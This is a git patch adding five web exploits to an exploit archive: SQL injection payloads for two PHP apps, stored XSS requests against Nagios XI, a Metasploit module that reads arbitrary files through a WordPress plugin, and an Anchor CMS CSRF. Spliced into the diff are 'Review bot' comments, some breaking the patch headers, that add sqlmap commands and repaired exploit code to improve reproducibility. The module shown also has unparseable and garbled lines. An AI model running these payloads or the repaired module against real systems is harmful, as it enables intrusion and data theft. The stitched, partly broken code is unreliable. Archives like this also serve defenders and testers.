From aa473257e9c9ce93fbcb34999c352c7108bc91eb Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 22 Jan 2021 05:01:56 +0000
Subject: [PATCH] DB: 2021-01-22

5 changes to exploits/shellcodes

Online Documents Sharing Platform 1.0 - 'user' SQL Injection
Apartment Visitors Management System 1.0 - 'email' SQL Injection
Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)
Anchor CMS 0.12.7 - CSRF (Delete user)
---
 exploits/multiple/webapps/49451.html | 19 ++++++
 exploits/php/webapps/49447.txt | 50 ++++++++++++++++
 exploits/php/webapps/49448.txt | 42 +++++++++++++
 exploits/php/webapps/49449.txt | 87 +++++++++++++++++++++++++++
 exploits/php/webapps/49450.rb | 89 ++++++++++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 292 insertions(+)
 create mode 100644 exploits/multiple/webapps/49451.html
 create mode 100644 exploits/php/webapps/49447.txt
 create mode 100644 exploits/php/webapps/49448.txt
 create mode 100644 exploits/php/webapps/49449.txt
 create mode 100755 exploits/php/webapps/49450.rb
diff --git a/exploits/multiple/webapps/49451.html b/exploits/multiple/webapps/49451.html
new file mode 100644
index 000000000..f4a072e9c
--- /dev/null
+++ b/exploits/multiple/webapps/49451.html
@@ -0,0 +1,19 @@
+# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
+# Exploit Author: Ninad Mishra
+# Vendor Homepage: https://anchorcms.com/
+# Software Link: https://anchorcms.com/download
+# Version: 0.12.7
+# CVE : CVE-2020-23342
+
+
+###PoC
+the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
+
+================================
+
+================================
+Where (21) is the user id .
+
+When admin clicks on exploit.html link
+
+User with id 21 will be deleted
\ No newline at end of file
diff --git a/exploits/php/webapps/49447.txt b/exploits/php/webapps/49447.txt
new file mode 100644
index 000000000..1f82d31fe
--- /dev/null
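Review bot: The PoC section between the two `================================` delimiters is empty in this rendering, so the exploit cannot be reproduced from the text alone; the delete link (its full path, with the user id as the last segment) should also be spelled out in a plain-text line such as `# Request: GET <admin user-delete endpoint>/21 (no anti-CSRF token required)` so the advisory survives HTML stripping. The header is also missing the `# Date:` and `# Tested on:` fields the other entries in this commit carry. A practitioner caveat worth adding after "When admin clicks on exploit.html link": the attack depends on the admin's session cookie being attached to a cross-site top-level GET, and the fix is to make deletion a POST carrying a per-session CSRF token, not merely to rename the route.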
+++ b/exploits/php/webapps/49447.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
+# Date: 21.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
+# Version: V1.0
+# Tested on: Windows 10
+
+#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection.
+
+----------------------------------------------------
+
+POST /path/login.php HTTP/1.1
+Host: test.com
+Content-Length: 29
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/path/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+user=%27&pass=%27&login=login
+
+----------------------------------------------------
+
+#PoC:
+
+Parameter: user (POST)
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: user=' AND (SELECT 2047 FROM(SELECT
+COUNT(*),CONCAT(0x7176706a71,(SELECT
+(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
+HnhM&pass='&login=login
\ No newline at end of file
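Review bot: The advisory proves injection through the `user` parameter of login.php but never states the impact or the remediation, so a reader cannot tell whether this is a nuisance or an authentication bypass; the `#Description` line should be followed by something like `#Impact: unauthenticated SQL injection in the login query; confirm whether it also bypasses authentication` and `#Fix: use prepared statements in login.php instead of concatenating user/pass into the query`. The captured request also sends `pass=%27` with the same quote, yet only `user` is discussed, so it is unclear whether `pass` was tested and found clean. Since the payloads are verbatim sqlmap output, the command used (for example `sqlmap -r login.req -p user --dbms=MySQL --technique=ET`) belongs under `#PoC:` so the result can be reproduced.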
diff --git a/exploits/php/webapps/49448.txt b/exploits/php/webapps/49448.txt
new file mode 100644
index 000000000..ab5f3a3ef
--- /dev/null
+++ b/exploits/php/webapps/49448.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
+# Date: 20.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0
+# Tested on: Windows 10
+
+----------------------------------------------------
+
+POST /avms/forgot-password.php HTTP/1.1
+Host: test.com
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/avms/forgot-password.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+
+email=test%40gmail.com&contactno=1&submit=
+
+----------------------------------------------------
+
+poC:
+
+
+Parameter: email (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: email=test@gmail.com' AND (SELECT 2600 FROM
+(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/49449.txt b/exploits/php/webapps/49449.txt
new file mode 100644
index 000000000..b4c064ad6
--- /dev/null
+++ b/exploits/php/webapps/49449.txt
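Review bot: Unlike the sibling 49447.txt, this entry has no description line at all, so the class and impact of the bug are left to the reader; a line such as `#Description: The 'email' parameter of forgot-password.php is vulnerable to time-based blind SQL Injection; the endpoint is presumably reachable without authentication, making this a pre-auth injection` should sit above the request capture. The captured `Origin: test.com` header is missing its scheme (compare the `Referer` line), which suggests the request was hand-edited rather than copied from the proxy; it is harmless for reproduction but should read `Origin: http://test.com`. As with 49447.txt, the sqlmap invocation that produced the `poC:` block (`sqlmap -r forgot.req -p email --dbms=MySQL --technique=T`) is worth recording.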
@@ -0,0 +1,87 @@
+# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
+# Date: 1-20-2021
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.5
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
+
+POST /nagiosxi/tools/mytools.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 145
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
+Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
+Upgrade-Insecure-Requests: 1
+
+nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
+# Vulnerable Parameter : groupID
+
+
+# POC
+# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.
+
+POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+Upgrade-Insecure-Requests: 1
+
+groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.
+
+POST /nagiosxi/ajaxhelper.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 147
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/account/
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+
+cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
\ No newline at end of file
diff --git a/exploits/php/webapps/49450.rb b/exploits/php/webapps/49450.rb
new file mode 100755
index 000000000..2ee36db20
--- /dev/null
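Review bot: The third PoC (`cmd=addview&url=javascript:alert(1)`) is a different bug class from the first two: the payload is a `javascript:` URI stored into a link target rather than an attribute break-out, so HTML-encoding the `url` field, which would fix the "My Tools" and BPI cases, leaves it exploitable; the advisory should say so, e.g. `# Note : the Views case requires a URL-scheme allow-list (http/https), not output encoding`. All three requests carry a session `Cookie` and an `nsp` value that look session-bound and will not replay as printed, so `# Exploit Details` should state that both must be copied from the tester's own authenticated session. The header also never states the privilege level needed to create tools, BPI groups or views (all three requests are authenticated), which determines whether this is a privilege-escalation issue or a self-XSS; a `# Privileges Required :` line is needed.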
+++ b/exploits/php/webapps/49450.rb 
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
+ 'Description' => %q{
+ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3,
+ allowing arbitrary file read with the web server privileges.
+ },
+ 'Author' =>
+ [
+ 'Arcangelo Saracino', # Vulnerability discovery
+ 'Hoa Nguyen - Suncsr Team', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-35749'],
+ ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
+ ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
+ ],
+ 'DisclosureDate' => 'Jan 15 2021'))
+
+ register_options([
+ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
+ OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
+ OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
+ OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
+ ])
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def check
+ cookie = wordpress_login(username,password)
+ if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ return CheckCode::Safe
+ end
+ CheckCode::Appears
+ end
+
+ def run_host(ip)
+ cookie = wordpress_login(username, password)
+ traversal = '../' * datastore['DEPTH']
+ filename = datastore['FILEPATH']
+ filename = filename[1, filename.length] if filename =~ /^\//
+
+ res = send_request_cgi({
+ 'cookie' => cookie,
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path,'wp-admin',''),
+ 'vars_get' =>
+ {
+ 'post' => 'application_id',
+ 'action' => 'edit',
+ 'sjb_file' => "#{traversal}#(unknown)"
+ }
+ })
+
+ fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+ fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+ print_good('Downloading file ...')
+ print_line("\n#{res.body}\n")
+ fname = datastore['FILEPATH']
+ path = store_loot(
+ 'Simple_JobBoard.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ fname
+ )
+ print_good("File save in: #{path}")
+ end
+ end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fd319346d..92458bfc2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
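Review bot: `check` has its branches inverted: the `if cookie.nil?` arm is the failed-login path, yet that is where `store_valid_credential` is called, so the module records credentials precisely when they did not work and reports `Appears` without ever storing the ones that did; `Safe` is also the wrong verdict for a login failure, which says nothing about the plugin. `run_host` then calls `wordpress_login` a second time and passes the result straight into `send_request_cgi` with no nil check, so bad credentials produce a confusing "Nothing was downloaded" rather than an authentication error. The line `fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, ...` holds two statements on one physical line (the hunk's 89-line count confirms it is one line in the file); as shown it cannot parse, so the module would fail to load and the two calls need to be on separate lines. The `'sjb_file' => "#{traversal}#(unknown)"` value also looks garbled in this rendering — `filename` is computed just above and otherwise unused, so the intended interpolation is presumably `#{filename}` and should be confirmed against the committed file. The rewritten `check` and the added guard are below.
```ruby
def check
  cookie = wordpress_login(username, password)
  return CheckCode::Unknown if cookie.nil?
  store_valid_credential(user: username, private: password, proof: cookie)
  CheckCode::Appears
end

def run_host(ip)
  cookie = wordpress_login(username, password)
  fail_with Failure::NoAccess, 'WordPress login failed: check USERNAME and PASSWORD' if cookie.nil?
  # … unchanged: traversal / FILEPATH setup and send_request_cgi …
  fail_with Failure::Unreachable, 'Connection failed' unless res
  fail_with Failure::NotVulnerable, 'Nothing was downloaded (HTTP status was not 200)' if res.code != 200
  # … unchanged: empty-body check, print and store_loot …
end
```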
@@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port
 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
+49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
 49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
@@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port
 49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
 49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
 49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
+49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
+49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
+49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
+49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,
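Review bot: The 49450 index row says "Simple Job Board 2.9.3 - Authenticated File Read", i.e. that 2.9.3 itself is affected, while the module it points to describes the bug as present in `'Simple JobBoard ' < 2.9.3`; one of the two is wrong and the affected-version claim is the single fact most users of this index rely on, so it should be checked against the fix release and aligned. The same row credits "SunCSR Team" where the module's `'Author'` list names `'Hoa Nguyen - Suncsr Team'`; index rows elsewhere in this commit reproduce the module author verbatim, and this one should too.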